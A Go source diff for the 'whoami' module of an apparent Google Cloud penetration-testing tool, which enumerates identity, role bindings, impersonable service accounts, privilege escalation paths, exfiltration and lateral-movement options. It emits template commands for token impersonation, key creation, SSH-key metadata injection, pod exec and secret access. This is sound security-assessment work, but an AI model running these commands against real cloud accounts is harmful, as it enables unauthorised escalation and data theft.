PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + Extended: whoamiExtended, + ProvidedGroups: allGroups, + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { + if m.Extended { + logger.InfoM("Gathering comprehensive identity context (extended mode)...", globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM("Gathering identity context...", globals.GCP_WHOAMI_MODULE_NAME) + } + + // Step 1: Get current identity + oauthService := OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "oauth2.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not retrieve token info") + return + } + + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), globals.GCP_WHOAMI_MODULE_NAME) + + // Step 2: Get organization context (always run) + m.getOrganizationContext(ctx, logger) + + // Step 3: Get group memberships for the current identity + m.getGroupMemberships(ctx, logger) + + // Step 4: Get role bindings across projects (always run) + m.getRoleBindings(ctx, logger) + + // Extended mode: Additional enumeration + if m.Extended { + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + + // Step 6: Identify data exfiltration capabilities + m.identifyDataExfilCapabilities(ctx, logger) + + // Step 7: Identify lateral movement capabilities + m.identifyLateralMoveCapabilities(ctx, logger) + } + + // Step 8: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager clients + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager client") + return + } + + // Create v3 client for fetching folder details + crmv3Service, err := crmv3.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager v3 client") + // Continue without v3, we just won't get display names for folders + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + // Fetch project details to get display name + projectInfo := ProjectInfo{ + ProjectID: projectID, + } + project, err := crmService.Projects.Get(projectID).Do() + if err == nil && project != nil { + projectInfo.DisplayName = project.Name + } + m.Identity.Projects = append(m.Identity.Projects, projectInfo) + + // Get ancestry + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s", projectID)) + continue + } + + for _, ancestor := range resp.Ancestor { + switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Try to get display name for organization + org, err := crmService.Organizations.Get(orgInfo.Name).Do() + if err == nil && org != nil { + orgInfo.DisplayName = org.DisplayName + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderName := fmt.Sprintf("folders/%s", ancestor.ResourceId.Id) + folderInfo := FolderInfo{ + Name: folderName, + } + // Try to get display name for folder using v3 API + if crmv3Service != nil { + folder, err := crmv3Service.Folders.Get(folderName).Do() + if err == nil && folder != nil { + folderInfo.DisplayName = folder.DisplayName + folderInfo.Parent = folder.Parent + } + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// normalizeGroupEmail ensures group has full email format +// If group doesn't contain @, tries to infer domain from identity email +func (m *WhoAmIModule) normalizeGroupEmail(group string) string { + if strings.Contains(group, "@") { + return group + } + + // Try to infer domain from identity email + if m.Identity.Email != "" && strings.Contains(m.Identity.Email, "@") { + parts := strings.SplitN(m.Identity.Email, "@", 2) + if len(parts) == 2 { + return group + "@" + parts[1] + } + } + + // Return as-is if we can't infer domain + return group +} + +// getGroupMemberships retrieves the groups that the current identity is a member of +func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Normalize provided groups to full email format + var normalizedGroups []string + for _, group := range m.ProvidedGroups { + normalizedGroups = append(normalizedGroups, m.normalizeGroupEmail(group)) + } + m.ProvidedGroups = normalizedGroups + + // Store provided groups + m.Identity.GroupsProvided = m.ProvidedGroups + + // Only applicable for user identities (not service accounts) + if m.Identity.Type != "user" { + m.Identity.GroupsEnumerated = true // N/A for service accounts + // If groups were provided for a service account, add them as provided + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) for service account", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } + return + } + + ciService, err := cloudidentity.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Identity client") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Search for groups that the user is a direct member of + // The parent must be "groups/-" to search across all groups + query := fmt.Sprintf("member_key_id == '%s'", m.Identity.Email) + resp, err := ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not fetch group memberships") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Successfully enumerated groups + m.Identity.GroupsEnumerated = true + + var enumeratedEmails []string + for _, membership := range resp.Memberships { + group := GroupMembership{ + GroupID: membership.Group, + DisplayName: membership.DisplayName, + Source: "enumerated", + } + if membership.GroupKey != nil { + group.Email = membership.GroupKey.Id + enumeratedEmails = append(enumeratedEmails, strings.ToLower(membership.GroupKey.Id)) + } + m.Identity.Groups = append(m.Identity.Groups, group) + } + + // Check for mismatch with provided groups + if len(m.ProvidedGroups) > 0 { + m.checkGroupMismatch(enumeratedEmails, logger) + } + + if len(m.Identity.Groups) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// useProvidedGroups adds provided groups when enumeration fails +func (m *WhoAmIModule) useProvidedGroups(logger internal.Logger) { + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) (enumeration failed)", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// checkGroupMismatch compares provided groups with enumerated groups +func (m *WhoAmIModule) checkGroupMismatch(enumeratedEmails []string, logger internal.Logger) { + enumeratedSet := make(map[string]bool) + for _, email := range enumeratedEmails { + enumeratedSet[strings.ToLower(email)] = true + } + + providedSet := make(map[string]bool) + for _, email := range m.ProvidedGroups { + providedSet[strings.ToLower(email)] = true + } + + // Check for provided groups not in enumerated + var notInEnumerated []string + for _, email := range m.ProvidedGroups { + if !enumeratedSet[strings.ToLower(email)] { + notInEnumerated = append(notInEnumerated, email) + } + } + + // Check for enumerated groups not in provided + var notInProvided []string + for _, email := range enumeratedEmails { + if !providedSet[strings.ToLower(email)] { + notInProvided = append(notInProvided, email) + } + } + + if len(notInEnumerated) > 0 || len(notInProvided) > 0 { + m.Identity.GroupsMismatch = true + if len(notInEnumerated) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Provided groups not found in enumerated: %s", strings.Join(notInEnumerated, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + if len(notInProvided) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Enumerated groups not in provided list: %s", strings.Join(notInProvided, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + } +} + +// getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Build list of group members to check + groupMembers := make(map[string]string) // group:email -> email for display + for _, group := range m.Identity.Groups { + if group.Email != "" { + groupMembers["group:"+group.Email] = group.Email + } + } + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get IAM bindings for project %s", projectID)) + continue + } + + // Find bindings for the current identity (direct) + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: "direct", + MemberType: m.Identity.Type, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + // Set inherited source if from parent resource + if binding.IsInherited && binding.InheritedFrom != "" { + rb.InheritedFrom = binding.InheritedFrom + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + + // Check for group-based bindings + if groupEmail, ok := groupMembers[principal.Name]; ok { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: fmt.Sprintf("group:%s", groupEmail), + MemberType: "group", + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s (via group %s)", binding.Role, binding.ResourceID, groupEmail)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + directCount := 0 + groupCount := 0 + for _, rb := range m.RoleBindings { + if rb.MemberType == "group" { + groupCount++ + } else { + directCount++ + } + } + + if groupCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) (%d direct, %d via groups)", len(m.RoleBindings), directCount, groupCount), globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project (without keys - not needed for impersonation check) + serviceAccounts, err := iamService.ServiceAccountsBasic(projectID) + if err != nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || shared.IsPublicPrincipal(tc) { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || shared.IsPublicPrincipal(kc) { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || shared.IsPublicPrincipal(aa) { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +// Uses FoxMapperService for comprehensive graph-based analysis +// Filters results to only show paths relevant to the current identity and their groups +// Will use cached FoxMapper data from context if available (e.g., from all-checks run) +func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + // Add current identity email (with various formats) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + // Add with type prefixes + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + // Add groups (enumerated or provided) + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + // Add special principals that apply to everyone + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if FoxMapper cache is available from context + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for privesc analysis", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyPrivEscPathsFromFoxMapper(foxMapperCache, relevantPrincipals, logger) + } else { + // No cache available, try to load FoxMapper data + m.identifyPrivEscPathsFromAnalysis(ctx, relevantPrincipals, logger) + } + + // Also check impersonation-based privilege escalation from findImpersonationTargets + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + ProjectID: target.ProjectID, + Permission: "iam.serviceAccounts.getAccessToken", + Category: "SA Impersonation", + Description: fmt.Sprintf("Can generate access tokens for %s", target.ServiceAccount), + SourceRole: "(via SA IAM policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccounts.getAccessToken", + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + ProjectID: target.ProjectID, + Permission: "iam.serviceAccountKeys.create", + Category: "Key Creation", + Description: fmt.Sprintf("Can create persistent keys for %s", target.ServiceAccount), + SourceRole: "(via SA IAM policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccountKeys.create", + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPathsFromFoxMapper extracts privesc paths from FoxMapper cache +func (m *WhoAmIModule) identifyPrivEscPathsFromFoxMapper(cache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool, logger internal.Logger) { + svc := cache.GetService() + if svc == nil { + return + } + + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + findings := svc.AnalyzePrivesc() + for _, finding := range findings { + // Check if this principal is relevant to our identity + cleanPrincipal := finding.Principal + if !relevantPrincipals[cleanPrincipal] && !relevantPrincipals["serviceAccount:"+cleanPrincipal] && !relevantPrincipals["user:"+cleanPrincipal] { + continue + } + + if !finding.CanEscalate && !finding.IsAdmin { + continue + } + + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = append(m.FoxMapperPrivescFindings, finding) + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", + Permission: "privesc", + Category: fmt.Sprintf("%s admin reachable", finding.HighestAdminLevel), + Description: fmt.Sprintf("Can escalate to %s admin in %d hops via %d paths", finding.HighestAdminLevel, finding.ShortestPathHops, finding.ViablePathCount), + SourceRole: finding.Principal, + SourceScope: finding.MemberType, + Command: "", + Confidence: "confirmed", + RequiredPerms: fmt.Sprintf("%d paths to admin", finding.ViablePathCount), + } + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } +} + +// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using FoxMapperService +func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive privesc analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) + return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") return } - logger.InfoM(fmt.Sprintf("authenticated user email: %s", principal.Email), globals.GCP_WHOAMI_MODULE_NAME) + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + // Run privesc analysis + findings := svc.AnalyzePrivesc() + + // Filter findings for relevant principals only + for _, finding := range findings { + // Check if this finding is for a relevant principal + if !relevantPrincipals[finding.Principal] && !relevantPrincipals[strings.ToLower(finding.Principal)] { + continue + } + + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = append(m.FoxMapperPrivescFindings, finding) + + // Convert each privesc path to whoami format + for _, path := range finding.Paths { + // Build command from first edge if available + command := "" + permission := "" + if len(path.Edges) > 0 { + command = generatePrivescCommandFromEdge(path.Edges[0]) + permission = path.Edges[0].ShortReason + } + + pathConf := path.Confidence + if pathConf == "" || pathConf == "high" { + pathConf = "confirmed" + } + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", // FoxMapper doesn't track project per edge + Permission: permission, + Category: "Privesc", + Description: fmt.Sprintf("Can escalate to %s admin via %d-hop path", path.AdminLevel, path.HopCount), + SourceRole: finding.Principal, + SourceScope: path.AdminLevel, + Command: command, + Confidence: pathConf, + RequiredPerms: permission, + } + + if path.ScopeBlocked { + privEscPath.Description += " (blocked by IAM condition)" + } + + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } + } } + +// generatePrivescCommandFromEdge generates a simple exploit command from a FoxMapper edge +func generatePrivescCommandFromEdge(edge foxmapperservice.Edge) string { + // Simple command generation based on edge reason + reason := strings.ToLower(edge.ShortReason) + + if strings.Contains(reason, "iam.serviceaccounts.getaccesstoken") { + return "gcloud auth print-access-token --impersonate-service-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccountkeys.create") { + return "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccounts.actas") { + return "# Use actAs to run services as the target SA" + } else if strings.Contains(reason, "setiampolicy") { + return "# Modify IAM policy to grant yourself additional permissions" + } else if strings.Contains(reason, "cloudfunctions") { + return "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA" + } else if strings.Contains(reason, "run.services") { + return "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA" + } + + return fmt.Sprintf("# Exploit via: %s", edge.Reason) +} + +// generateExfilCommand generates a data exfiltration command based on permission +func generateExfilCommand(permission, service string) string { + switch { + case strings.Contains(permission, "storage.objects.get"): + return "gsutil cp gs://BUCKET/path/to/file ./local/" + case strings.Contains(permission, "bigquery.tables.getData"): + return "bq query 'SELECT * FROM dataset.table'" + case strings.Contains(permission, "bigquery.tables.export"): + return "bq extract dataset.table gs://BUCKET/export.csv" + case strings.Contains(permission, "cloudsql.instances.export"): + return "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB" + case strings.Contains(permission, "secretmanager.versions.access"): + return "gcloud secrets versions access latest --secret=SECRET" + case strings.Contains(permission, "cloudkms.cryptoKeyVersions.useToDecrypt"): + return "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION" + case strings.Contains(permission, "logging.logEntries.list"): + return "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'" + case strings.Contains(permission, "pubsub.subscriptions.consume"): + return "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack" + default: + return fmt.Sprintf("# Use permission: %s (service: %s)", permission, service) + } +} + +// generateLateralCommand generates a lateral movement command based on permission +func generateLateralCommand(permission, category string) string { + switch { + case strings.Contains(permission, "iam.serviceAccounts.getAccessToken"): + return "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL" + case strings.Contains(permission, "iam.serviceAccountKeys.create"): + return "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL" + case strings.Contains(permission, "compute.instances.osLogin"): + return "gcloud compute ssh INSTANCE_NAME --zone=ZONE" + case strings.Contains(permission, "compute.instances.setMetadata"): + return "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"" + case strings.Contains(permission, "container.clusters.getCredentials"): + return "gcloud container clusters get-credentials CLUSTER --zone=ZONE" + case strings.Contains(permission, "container.pods.exec"): + return "kubectl exec -it POD -- /bin/sh" + case strings.Contains(permission, "cloudfunctions.functions.create"): + return "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL" + case strings.Contains(permission, "run.services.create"): + return "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL" + default: + return fmt.Sprintf("# Use permission: %s (category: %s)", permission, category) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + // Roles that map to dangerous permissions for privilege escalation + dangerousRoles := []string{ + // Owner/Editor - broad access + "roles/owner", + "roles/editor", + // IAM roles - service account impersonation and key creation + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/iam.serviceAccountUser", // iam.serviceAccounts.actAs + // Resource Manager - IAM policy modification + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + // Compute - metadata injection, instance creation + "roles/compute.admin", + "roles/compute.instanceAdmin", + "roles/compute.instanceAdmin.v1", + // Serverless - code execution with SA + "roles/cloudfunctions.admin", + "roles/cloudfunctions.developer", + "roles/run.admin", + "roles/run.developer", + // CI/CD - Cloud Build SA abuse + "roles/cloudbuild.builds.editor", + "roles/cloudbuild.builds.builder", + // GKE - cluster and pod access + "roles/container.admin", + "roles/container.clusterAdmin", + // Storage + "roles/storage.admin", + // Secrets + "roles/secretmanager.admin", + "roles/secretmanager.secretAccessor", + // Deployment Manager + "roles/deploymentmanager.editor", + // Org Policy + "roles/orgpolicy.policyAdmin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// identifyDataExfilCapabilities identifies data exfiltration capabilities for the current identity +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using cached exfil data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyDataExfilFromCache(foxMapperCache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyDataExfilFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.DataExfilCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[EXFIL] Found %d data exfiltration capability(s)", len(m.DataExfilCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyDataExfilFromCache extracts exfil capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyDataExfilFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return + } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based exfil detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeDataExfil method +} + +// identifyDataExfilFromAnalysis runs fresh exfil analysis using FoxMapperService +func (m *WhoAmIModule) identifyDataExfilFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive exfil analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) + return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") + return + } + + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run data exfil analysis (empty string means all services) + findings := svc.AnalyzeDataExfil("") + + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true + + capability := DataExfilCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Service, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) + } + } + + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperDataExfilFindings = append(m.FoxMapperDataExfilFindings, finding) + } + } +} + +// identifyLateralMoveCapabilities identifies lateral movement capabilities for the current identity +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + 